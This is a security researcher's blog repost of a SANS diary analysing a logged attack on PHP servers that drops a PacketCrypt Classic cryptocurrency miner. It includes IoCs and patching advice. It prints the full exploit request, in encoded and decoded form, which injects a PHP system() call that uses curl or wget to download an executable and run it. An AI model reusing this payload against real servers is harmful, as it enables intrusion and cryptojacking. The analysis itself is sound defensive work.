07 Jan SANS InfoSec Handlers Diary Blog – PacketCrypt Classic Cryptocurrency Miner on PHP Servers

I recently wrote a diary on the SANS Internet Storm Center about PacketCrypt Classic cryptocurrency miners on PHP Servers.

Please click here to read the full diary entry and this diary entry has been briefly mentioned in the SANS Daily Network Security Podcast (Stormcast) for Wednesday, January 8th, 2025 over here. Alternatively, the full diary is reposted in full below.

The SANS DShield project receives a wide variety of logs submitted by participants of the DShield project. Looking at the “First Seen” URLs page, I observed an interesting URL and dived deeper to investigate. The URL recorded is as follows:

/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F[redacted]%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F[redacted]%2Fdr0p.exe%20%26%26%20

Let’s make it more readable via the quintessential CyberChef or another web proxy tool such as Burp Decoder:

/cgi-bin/php-cgi.exe?arg=
Content-Type: text/plain

<?php system('curl -L -k -O http://[redacted]/dr0p.exe && ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe && 

Interesting. As the name implies, it looks like an executable that is designed to download a secondary payload. A quick search of the filename yielded a recent VirusTotal (VT) submission [1] and a SHA256 hash of d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36.

Some brief dynamic malware reverse engineering yielded very interesting observations. Firstly, dr0p.exe went ahead to retrieve a secondary file pkt1.exe (e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562) from 23.27.51.244. According to Shodan (and with reference to Figure 1), the US-based IP address had 4 open ports (22, 80, 110, and 6664) and was running the EvilBit Block Explorer on port 80.

The file pkt1.exe further spawns an executable packetcrypt.exe and passes a PacketCrypt (PKT Classic) wallet address (pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a) as part of the arguments. Let us take a look at the mining done so far via the native PKT Classic (PKTC) blockchain explorer [2]. With reference to Figure 2, the owner of the wallet appears to have made 5 PKTC so far (roughly about 0.0021785USDT at current prices).

The observed web URL activity appears to exploit vulnerable (such as the recent CVE-2024-4577) PHP servers or misconfigured PHP servers that allow unfettered public access to php-cgi.exe for reasons only known to system owners. If you have not checked on your PHP servers for a while (which should never be the case!), perhaps this is a gentle reminder for systems owners to patch and audit their web servers for vulnerabilities and unintended performance issues caused by crypto miners.

Side note: During the investigation, it was noted that the PacketCrypt (PKT) project evolved from a proof-of-work approach [now known as PKT Classic (PKTC)] to a new Stake-to-Earn (currently known as PKT) approach [3]. As such, there is a distinction in the cryptocurrency for the legacy project (PKTC) and the current iteration (PKT). In this diary, the mined cryptocurrency on vulnerable PHP servers is PKTC.

Indicators-of-Compromise (IoCs):

23.27.51.244 (IP address where pkt1.exe is retrieved)
d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36 (SHA256 hash of dr0p.exe)
e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562 (SHA256 hash of pkt1.exe)
717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397 (SHA256 hash of packetcrypt.exe)
pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a (PKTC Wallet Address)

References:

1. https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36
2. https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&minutes=1440&pools=all
3. https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/